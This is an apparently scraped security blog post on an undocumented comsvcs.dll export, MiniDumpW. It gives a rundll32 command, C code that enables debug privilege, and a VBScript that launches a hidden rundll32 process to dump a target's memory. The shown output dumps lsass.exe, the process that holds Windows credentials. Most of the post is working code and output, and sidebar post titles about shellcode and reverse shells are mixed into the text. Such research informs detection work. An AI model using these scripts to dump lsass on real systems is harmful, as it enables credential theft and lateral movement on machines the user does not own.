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# MiniDumpWriteDump via COM+ Services DLL

Posted on August 30, 2019 by odzhan

## Introduction

This will be a very quick code-oriented post about a DLL function exported by comsvcs.dll that I was unable to find any reference to online.

UPDATE: Memory Dump Analysis Anthology Volume 1 that was published in 2008 by Dmitry Vostokov, discusses this function in a chapter on COM+ Crash Dumps. The reason I didn't find it before is because I was searching for "MiniDumpW" and not "MiniDump".

While searching for DLL/EXE that imported <a href="DBGHELP!MiniDumpWriteDump">DBGHELP!MiniDumpWriteDump</a>, I discovered comsvcs.dll exports a function called MiniDumpW which appears to have been designed specifically for use by rundll32. It will accept three parameters but the first two are ignored. The third parameter should be a UNICODE string combining three tokens/parameters wrapped in quotation marks. The first is the process id, the second is where to save the memory dump and third requires the keyword "full" even though there's no alternative for this last parameter.

To use from the command line, type the following: "rund1132 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full"" where "1234" is the target process to dump. Obviously, this assumes you have permission to query and read the memory of target process. If COMSVCS!MiniDumpW encounters an error, it simply calls KERNEL32!ExitProcess and you won't see anything. The following code in C demonstrates how to invoke it dynamically.

BTW, HRESULT is probably the wrong return type. Internally it exits the process with E\_INVALIDARG if it encounters a problem with the parameters, but if it succeeds, it returns 1. S OK is defined as 0.

#define UNICODE
#include <windows.h>
#include <stdio.h>

```
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
```

```
typedef HRESULT (WINAPI * MiniDumpW)(
 DWORD arg1, DWORD arg2, PWCHAR cmdline);
typedef NTSTATUS (WINAPI *_RtlAdjustPrivilege)(
 ULONG Privilege, BOOL Enable,
 BOOL CurrentThread, PULONG Enabled);
// "<pid> <dump.bin> full"
int wmain(int argc, wchar_t *argv[]) {
   HRESULT
                        hr;
   MiniDumpW
                        MiniDumpW;
   _RtlAdjustPrivilege RtlAdjustPrivilege;
   ULONG
                        t;
   MiniDumpW
                       = ( MiniDumpW)GetProcAddress(
      LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
    RtlAdjustPrivilege = ( RtlAdjustPrivilege)GetProcAddress(
     GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
   if(MiniDumpW == NULL) {
      printf("Unable to resolve COMSVCS!MiniDumpW.\n");
      return 0;
    }
    // try enable debug privilege
    RtlAdjustPrivilege(20, TRUE, FALSE, &t);
   printf("Invoking COMSVCS!MiniDumpW(\"%ws\")\n", argv[1]);
   // dump process
   MiniDumpW(0, 0, argv[1]);
   printf("OK!\n");
   return 0;
}
```

Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBscript will work in an elevated process.

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  - Injection: PROPagate
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- Shellcode: Synchronous shell for Linux in ARM32 assembly
- Windows Process Injection: Code Injection Methods
- Windows Process Injection: Writing the payload

```
' get process id or name
pid = WScript.Arguments(0)
' connect with debug privilege
Set fso = CreateObject("Scripting.FileSystemObject")
Set svc = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}"
' if not a number
If(Not IsNumeric(pid)) Then
  query = "Name"
Else
  query = "ProcessId"
End If
' try find it
Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
  query & " = '" & pid & "'")
If (list.Count = 0) Then
 WScript.StdOut.WriteLine("Can't find active process : " & pid)
 WScript.Quit()
End If
For Each proc in list
 pid = proc.ProcessId
  str = proc.Name
  Exit For
Next
dmp = fso.GetBaseName(str) & ".bin"
' if dump file already exists, try to remove it
If(fso.FileExists(dmp)) Then
 WScript.StdOut.WriteLine("Removing " & dmp)
 fso.DeleteFile(dmp)
End If
WScript.StdOut.WriteLine("Attempting to dump memory from " & _
  str & ":" & pid & " to " & dmp)
              = svc.Get("Win32 Process")
Set proc
Set startup
               = svc.Get("Win32_ProcessStartup")
               = startup.SpawnInstance_
Set cfg
cfg.ShowWindow = SW_HIDE
cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
      pid & " " & fso.GetAbsolutePathName(".") & "\" & _
      dmp & " full"
Call proc.Create (cmd, null, cfg, pid)
```

- Shellcode: Synchronous shell for Linux in amd64 assembly
- Shellcode: Synchronous shell for Linux in x86 assembly
- Stopping the Event Logger via Service Control Handler
- Shellcode: Encryption Algorithms in ARM Assembly
- Shellcode: A Tweetable Reverse Shell for x86 Windows
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- Shellcode: Linux ARM Thumb mode
- Using Windows Schannel for Covert Communication
- Shellcode: x86 optimizations part 1
- WanaCryptor File Encryption and Decryption
- Shellcode: Dual Mode (x86 + amd64) Linux shellcode
- Shellcode: Fido and how it resolves GetProcAddress and LoadLibrary A

```
' sleep for a second
Wscript.Sleep(1000)

If(fso.FileExists(dmp)) Then
    WScript.StdOut.WriteLine("Memory saved to " & dmp)
Else
    WScript.StdOut.WriteLine("Something went wrong.")
End If
End If
```

Run from elevated cmd prompt.

```
C:\hub\injection\ntuserpfn>cscript procdump.vbs lsass.exe
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
Removing lsass.bin
Attempting to dump memory from lsass.exe:648 to lsass.bin
Memory saved to lsass.bin
```

No idea how useful this could be, but since it's part of the operating system, it's probably worth knowing anyway. Perhaps you will find similar functions in signed binaries that perform memory dumping of a target process.

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